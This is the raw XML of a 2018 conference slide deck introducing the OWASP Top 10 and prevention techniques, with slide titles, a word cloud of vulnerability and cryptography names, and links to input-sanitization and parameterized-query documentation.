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7" r:id="rId3"/>
    <p:sldId id="277" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="263" r:id="rId6"/>
    <p:sldId id="264" r:id="rId7"/>
    <p:sldId id="265" r:id="rId8"/>
    <p:sldId id="273" r:id="rId9"/>
    <p:sldId id="267" r:id="rId10"/>
    <p:sldId id="268" r:id="rId11"/>
    <p:sldId id="269" r:id="rId12"/>
    <p:sldId id="270" r:id="rId13"/>
    <p:sldId id="271" r:id="rId14"/>
    <p:sldId id="278" r:id="rId15"/>
    <p:sldId id="279" r:id="rId16"/>
    <p:sldId id="280" r:id="rId17"/>
    <p:sldId id="281" r:id="rId18"/>
    <p:sldId id="282" r:id="rId19"/>
    <p:sldId id="291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302" r:id="rId28"/>
    <p:sldId id="303" r:id="rId29"/>
    <p:sldId id="304" r:id="rId30"/>
    <p:sldId id="305" r:id="rId31"/>
    <p:sldId id="283" r:id="rId32"/>
    <p:sldId id="284" r:id="rId33"/>
    <p:sldId id="285" r:id="rId34"/>
    <p:sldId id="286" r:id="rId35"/>
    <p:sldId id="287" r:id="rId36"/>
    <p:sldId id="288" r:id="rId37"/>
    <p:sldId id="292" r:id="rId38"/>
    <p:sldId id="312" r:id="rId39"/>
    <p:sldId id="300" r:id="rId40"/>
    <p:sldId id="306" r:id="rId41"/>
    <p:sldId id="307" r:id="rId42"/>
    <p:sldId id="308" r:id="rId43"/>
    <p:sldId id="309" r:id="rId44"/>
    <p:sldId id="310" r:id="rId45"/>
    <p:sldId id="311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4" r:id="rId67"/>
    <p:sldId id="335" r:id="rId68"/>
    <p:sldId id="336" r:id="rId69"/>
    <p:sldId id="338" r:id="rId70"/>
    <p:sldId id="337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50" r:id="rId82"/>
    <p:sldId id="351" r:id="rId83"/>
    <p:sldId id="352" r:id="rId84"/>
    <p:sldId id="353" r:id="rId85"/>
    <p:sldId id="354" r:id="rId86"/>
    <p:sldId id="355" r:id="rId87"/>
    <p:sldId id="356" r:id="rId88"/>
    <p:sldId id="357" r:id="rId89"/>
    <p:sldId id="358" r:id="rId90"/>
    <p:sldId id="376" r:id="rId91"/>
    <p:sldId id="359" r:id="rId92"/>
    <p:sldId id="360" r:id="rId93"/>
    <p:sldId id="364" r:id="rId94"/>
    <p:sldId id="362" r:id="rId95"/>
    <p:sldId id="363" r:id="rId96"/>
    <p:sldId id="365" r:id="rId97"/>
    <p:sldId id="366" r:id="rId98"/>
    <p:sldId id="367" r:id="rId99"/>
    <p:sldId id="368" r:id="rId100"/>
    <p:sldId id="369" r:id="rId101"/>
    <p:sldId id="370" r:id="rId102"/>
    <p:sldId id="371" r:id="rId103"/>
    <p:sldId id="372" r:id="rId104"/>
    <p:sldId id="373" r:id="rId105"/>
    <p:sldId id="374" r:id="rId106"/>
    <p:sldId id="375" r:id="rId10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EDEDED"/>
    <a:srgbClr val="A9AAA4"/>
    <a:srgbClr val="E0D9D3"/>
    <a:srgbClr val="E8C1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5" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="40" d="100"/>
          <a:sy n="40" d="100"/>
        </p:scale>
        <p:origin x="1426" y="10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9132-9E69-4D55-A194-B310DBE92991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B4BF-F912-4348-809D-3F4D4BE2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3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let these names let you off.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Massive field, and others manage it well for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3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- Act with the fist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - Forget all that, we start from the simple things.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9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5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6B4BF-F912-4348-809D-3F4D4BE2A8D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9BF8-9C1C-4C7D-A065-D09EC4A07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DCCEC-6413-478A-B4D3-FD964191B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9E7B6-8552-40C9-BA50-A86A5EF9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619E5-482A-4B27-A2BE-886E0FBF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DED79-B68F-49FA-B72C-B8317FEC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63814-2685-4329-900C-37C187A0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BE67C-D0C9-4B70-88FD-6EF0EA7E9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F4DE-2C9A-4A69-84BC-2E4FE08D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6592-BD73-4D56-A631-82434E18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F976-09A1-4F69-87D9-30172C6B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0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E027B-2166-4122-AB3B-F3565DC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670C7-40FC-4DA8-8122-899090D6F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274A-33CB-4E55-85F2-74740AB1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B0DC8-A03E-4EC4-AC08-545E9A75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2FBDC-719F-4D54-A9D7-F6EE2687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8761-AF76-401A-A76A-7DC81907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CCB5-5DAB-4BE6-A794-B33E24D04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441F-E174-4CEB-A636-2BA81BD1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F405-673E-40A0-BD80-055B4009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D8C66-2B36-4736-AAB1-7B3DB04D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9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8A4E-C584-45A6-BBEA-B7FCD623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62BC9-037D-43A2-898B-3E5E33AD5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5496-A78D-46DC-817D-A3C28ED1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63C9-BA8F-44FB-ACBE-154FD341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509E1-0BD3-4E50-9796-1EB465B0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7F26-EAAB-4E5E-A617-DEB5F4A0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3B50-2A49-44A8-8B31-EC176A335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3241D-FBEC-4209-8CDC-1BB901CF8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D2A2D-75EA-4306-BD8B-3B489449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F5718-2F6F-404C-A100-812B9F80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E152-4F0A-47B8-AD3C-5A507416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0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345B-1D62-43A6-B400-9BBB565D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F619C-3404-4375-B072-CA6BFA9E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8C78A-2748-4D4C-BB7D-658B4EC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0F1BD-3132-4512-99C3-ED0432E2D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CF101-6E3A-4C09-A0A5-9094E503D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F405FB-A94F-4656-810A-AFC4ED8F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0A6D3-8858-4556-A3B0-4092949B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28620-F806-4922-BF8D-9F2CE675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0586-9032-4368-85E7-6E253451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40A6F-44BD-43E4-A3CC-3BEF9CDC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25B69-D39B-454C-BAAC-7D798D0F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8E7CC-4324-47F3-A351-AD8DCAD2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DC6FC-1955-4FAE-B2D5-A4D38A43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55D883-CB74-453D-870E-1249D08B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4947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OWASP Top 10 – https://ayesh.me/talk/OWASP-Top10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0CA26-DF3C-43AF-80BD-7458FD19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D46D-68D6-45D5-89D2-752637B0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591D2-4C3A-406D-B374-435E2477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F6F9D-CB6E-43A9-A767-E637202C4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960BA-48B4-4688-ABB6-904D1E6E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09FE3-B27B-4976-AD52-68054A16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21582-A4C8-458B-9EE9-0A1AA2AC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A959-C6AE-4AD9-B01A-A25AB69B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21FB7-AD35-4341-AFF2-051FC3A32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EEDFA-EA60-4AE4-953E-7ADCF5798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8869A-020C-4B7A-9EE0-19E5AB2C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760F2-359D-4C78-9C86-74D3B9F7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53ABA-7C8B-4392-A0C8-8B431080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846DB-D36D-47C0-A9F2-A5CAE650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127DB7-3574-4C56-AE25-325C774E5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CAD11-B1DC-41A4-B033-1AFB74B78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BEAF-1621-4BD2-9BA1-F8EABDCFBD13}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/16/18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F1534-051C-4DCD-B4F6-43F0A113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6592-FFF9-4211-851C-D4734A8B1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5AC9-87B5-47F9-8D04-F7F76757B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yesh.me/talk/OWASP-Top1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jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.jp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racking@site.noob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racking@site.noob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php.net/filter_var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github.com/chriso/validator.j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s://php.net/manual/en/filter.filters.validate.php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hyperlink" Target="http://php.net/manual/tr/filter.filters.sanitize.php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p.net/filter_var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php.net/manual/en/filter.filters.sanitize.php" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/chriso/validator.js" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://php.net/filter_var" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://api.drupal.org/api/drupal/core%21includes%21common.inc/group/sanitization/8.6.x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hyperlink" Target="https://api.drupal.org/api/drupal/includes%21common.inc/group/sanitization/7.x" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://codex.wordpress.org/Validating_Sanitizing_and_Escaping_User_Data" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://php.net/htmlspecialchars" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://api.joomla.org/cms-3/classes/Joomla.CMS.Filter.InputFilter.html#method_cle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s://phpdelusions.net/pdo" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mysqljs/mysql#escaping-query-values" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://php.net/manual/en/book.pdo.php" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.drupal.org/docs/8/api/database-api/static-querie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hyperlink" Target="https://www.drupal.org/docs/7/api/database-api/static-queries" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://codex.wordpress.org/Class_Reference/wpdb#Protect_Queries_Against_SQL_Injection_Attacks" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://php.net/manual/en/book.mysqli.php" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.joomla.org/Selecting_data_using_JDatabase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1.svg"/><Relationship Id="rId7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1B26B1-0296-4E54-88F6-9BF8BE1C8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15" y="3886124"/>
            <a:ext cx="11700769" cy="165576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2500" lnSpcReduction="20000"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OWASP TOP 10 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="48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  <a:cs typeface="CordiaUPC" panose="020B0502040204020203" pitchFamily="34" charset="-34"/>
              </a:rPr>
              <a:t>Introduction and Prevention Techniques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 Light" panose="020B0603030403020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="CordiaUPC" panose="020B05020402040202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7A4A2-4F0B-497E-987F-A499C685E561}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276220" y="6269392"/>
            <a:ext cx="563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Ayesh Karunaratne |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https://ayesh.me/talk/OWASP-Top10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68411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382E5-AAF0-4441-A98D-85B4502E41BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3606824" y="2921168"/>
            <a:ext cx="497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603030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Power Sockets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13425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5117234" y="192617"/>
            <a:ext cx="195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TOP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3D13B-EA9D-4AFC-9495-9A8E2D3BF411}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076960" y="1422400"/>
            <a:ext cx="6870150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Cross Site Scripting (XSS)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Secure Data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Insecure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Unserialization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XML External Entities (XXE)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Components with known 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Security Misconfiguration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Insufficient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28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23063-FD29-49B3-A978-7A0D579106B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-758553" y="305068"/>
            <a:ext cx="13302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Never Trust</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US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Input!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30774840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23063-FD29-49B3-A978-7A0D579106B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-555353" y="920621"/>
            <a:ext cx="1330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We all screw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="16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Security up</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13814235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23063-FD29-49B3-A978-7A0D579106B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-555353" y="920621"/>
            <a:ext cx="1330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Build security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="16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Into pipeline</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11848280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23063-FD29-49B3-A978-7A0D579106B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-555353" y="920621"/>
            <a:ext cx="13302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Raise Awareness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="276876311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572CD2-317D-4759-A42B-C314AE51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1" y="824721"/>
            <a:ext cx="5669231" cy="3517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398752-C3B3-4201-8D0C-2CD4432D8A9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6360506" y="4341958"/>
            <a:ext cx="4389343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SecOSday – Darmstadt, Germany</a:t>
            </a:r>
          </a:p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17/11/2018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559D43-FF99-4C80-813B-849F3AEF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4" y="1059108"/>
            <a:ext cx="4533027" cy="3048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CAAE3-9574-4987-B7EC-4202FCEFBBAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1096844" y="4338058"/>
            <a:ext cx="4290021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Unconference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Essen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Germany</a:t>
            </a:r>
          </a:p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/11/2018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18/11/2018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15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m Hanks Thank You GIF - Find &amp; Share on GIPHY">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4F6B31B-EF0C-47D8-A09A-90844389F1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1371600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4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382E5-AAF0-4441-A98D-85B4502E41BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3606824" y="-37823"/>
            <a:ext cx="4978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603030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Power Sockets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A close up of a tool&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{003C40E4-AAF3-4027-AB19-2FFCB9C9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2" y="2987041"/>
            <a:ext cx="1746729" cy="1746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B2E37-9EF4-45EE-BFCE-29A9FD5E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9" y="977842"/>
            <a:ext cx="1775872" cy="1775872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08A95630-55C7-45FF-A8DD-28DBEC8CE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73" y="4964847"/>
            <a:ext cx="1746730" cy="1746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290EA2-7C65-4C45-A6FB-569177819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78" y="2987041"/>
            <a:ext cx="1746730" cy="1746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FD2E-C7B2-4BB7-B2F1-1738BD01F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74" y="4964845"/>
            <a:ext cx="1746730" cy="1746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079DF6-BA0B-4A21-9A3C-D3586499F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60" y="2987042"/>
            <a:ext cx="1746730" cy="1746730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17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0EF29961-F3BC-4884-AB62-75EF6A6DC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84" y="4964845"/>
            <a:ext cx="1746730" cy="1746730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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22AA38D2-8F36-4BD2-B0CA-682B1C0EA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9" y="4964845"/>
            <a:ext cx="1746730" cy="1746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E252F6-7ED4-41C8-BE39-7067B8A46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29" y="2987041"/>
            <a:ext cx="1775872" cy="1775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B806E0-4732-4FA4-B502-B8CEED835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2" y="977842"/>
            <a:ext cx="1746729" cy="1746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5B42A6-239F-42AE-829B-517251CF19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78" y="977842"/>
            <a:ext cx="1746730" cy="17467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7933D3-F69E-4B32-AB51-80F6EEFED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5" y="2987042"/>
            <a:ext cx="1746730" cy="17467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FC2BFD-71BF-4331-A1D1-C63A2A8490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72" y="977840"/>
            <a:ext cx="1746731" cy="17467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A6CAC9-2478-41AC-87E2-BAC78C25C3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4" y="977842"/>
            <a:ext cx="1746731" cy="17467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877C79-DE3A-494A-BCB2-B28B16C63C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97" y="4964845"/>
            <a:ext cx="1746730" cy="17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58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382E5-AAF0-4441-A98D-85B4502E41BE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603030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Universal Power Adapter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A close up of a tool&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{003C40E4-AAF3-4027-AB19-2FFCB9C95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558" y="3218116"/>
            <a:ext cx="1746729" cy="1746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B2E37-9EF4-45EE-BFCE-29A9FD5ED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92" y="-4258638"/>
            <a:ext cx="1775872" cy="1775872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08A95630-55C7-45FF-A8DD-28DBEC8CE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73" y="8943589"/>
            <a:ext cx="1746730" cy="1746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290EA2-7C65-4C45-A6FB-569177819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64" y="3730074"/>
            <a:ext cx="1746730" cy="1746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42FD2E-C7B2-4BB7-B2F1-1738BD01F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26" y="8368445"/>
            <a:ext cx="1746730" cy="17467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079DF6-BA0B-4A21-9A3C-D3586499F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960" y="5315179"/>
            <a:ext cx="1746730" cy="1746730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17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0EF29961-F3BC-4884-AB62-75EF6A6DC4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27" y="9663845"/>
            <a:ext cx="1746730" cy="1746730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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22AA38D2-8F36-4BD2-B0CA-682B1C0EA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4" y="9054245"/>
            <a:ext cx="1746730" cy="1746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E252F6-7ED4-41C8-BE39-7067B8A46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28" y="7465938"/>
            <a:ext cx="1775872" cy="17758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B806E0-4732-4FA4-B502-B8CEED835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7918" y="142298"/>
            <a:ext cx="1746729" cy="17467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5B42A6-239F-42AE-829B-517251CF19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864" y="-3213158"/>
            <a:ext cx="1746730" cy="17467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B7933D3-F69E-4B32-AB51-80F6EEFED6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730" y="-2114748"/>
            <a:ext cx="1746730" cy="17467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1FC2BFD-71BF-4331-A1D1-C63A2A8490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9594" y="507831"/>
            <a:ext cx="1746731" cy="17467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A6CAC9-2478-41AC-87E2-BAC78C25C3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9" y="-4959889"/>
            <a:ext cx="1746731" cy="17467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877C79-DE3A-494A-BCB2-B28B16C63C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696" y="6188544"/>
            <a:ext cx="1746730" cy="1746730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7B6FD0D8-2CEA-425A-979A-439C58173F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664" y="1227810"/>
            <a:ext cx="50101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3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382E5-AAF0-4441-A98D-85B4502E41BE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603030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bodged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603030403020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Power Adapter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A picture containing indoor, wall, sitting, metal&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CFD128F-CE30-4DE6-B592-44F689257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1634574"/>
            <a:ext cx="35718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6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0A9A5-5AF4-4929-A790-CD8F77D4BFEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1470431" y="1554434"/>
            <a:ext cx="137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996AE-97AE-4AA9-9669-5E6EFDB66C2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2205916" y="166490"/>
            <a:ext cx="465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Bleichenbacher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13755-0D7B-49D0-BF8C-CFB5A21D038B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3468608" y="1873630"/>
            <a:ext cx="1636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CSRF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A1F3A-ACEB-4E1D-8E19-2F6CDB179848}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5747015" y="1831898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SQLi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715E6-B81D-4975-A47A-7343AA092B69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4287102" y="3809809"/>
            <a:ext cx="1307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XXE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1296D-2087-4FBA-A56A-D467033903CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6396767" y="3905316"/>
            <a:ext cx="147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WTF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ECB27-E333-4563-9861-B94816C1D062}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8590819" y="2903821"/>
            <a:ext cx="141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BBQ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2A0FB-4D4E-4F12-962C-1F8C80B5FAD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1139187" y="3477386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FREAK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59EE5-770B-4BCB-8487-42A03D63369E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7360610" y="2138180"/>
            <a:ext cx="2642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LOGJAM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B721B-5E72-46B3-AC39-2B2D039BBFD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7122999" y="4828646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BEAST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5A39E-E597-47C5-9B38-3FC492B0DCE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="891087" y="5009634"/>
            <a:ext cx="355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Heart Bleed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EA0BA-ABFE-45BA-8708-1326196D8240}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2063097" y="2833304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XSS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B5814-38A8-48D5-A503-D85318683E8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5145726" y="5242261"/>
            <a:ext cx="197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Argon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C21A3-B032-4A04-828F-0BD3F1BF43C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9359560" y="4512386"/>
            <a:ext cx="2152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BCrypt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0B494-9039-447D-A4E7-1A96F8BC455C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9298686" y="435771"/>
            <a:ext cx="1968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SHA-3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79D5BE-69DF-46C7-844A-8C9F24F2A684}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9589151" y="1514997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TLS 1.3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6FD0E-4F57-40A5-BDB3-DFB19BECB8C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="69355" y="2201526"/>
            <a:ext cx="269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Ed25519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E252D-ACC4-4DF6-9A01-372BA1C7FEAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="364175" y="197036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E30C7-BBC7-47BA-83F3-8CDBCD356A4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2892676" y="1073200"/>
            <a:ext cx="6568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CHACHA20-POLY1305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87E18C-580E-4110-8D2A-88C4CBB48443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2847574" y="4349056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PCI-DSS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EC8B2-0D14-4D3C-AB47-3C59FBB853B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3501251" y="2952194"/>
            <a:ext cx="1316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RC4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4F98E-0B42-443F-812F-0802944A250E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4819529" y="2543975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DKIM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D888F-7C3C-4FBB-B046-AC7363DBE8C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7184242" y="223333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MD5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0329F-7D94-4962-886E-F3F509A6EB02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
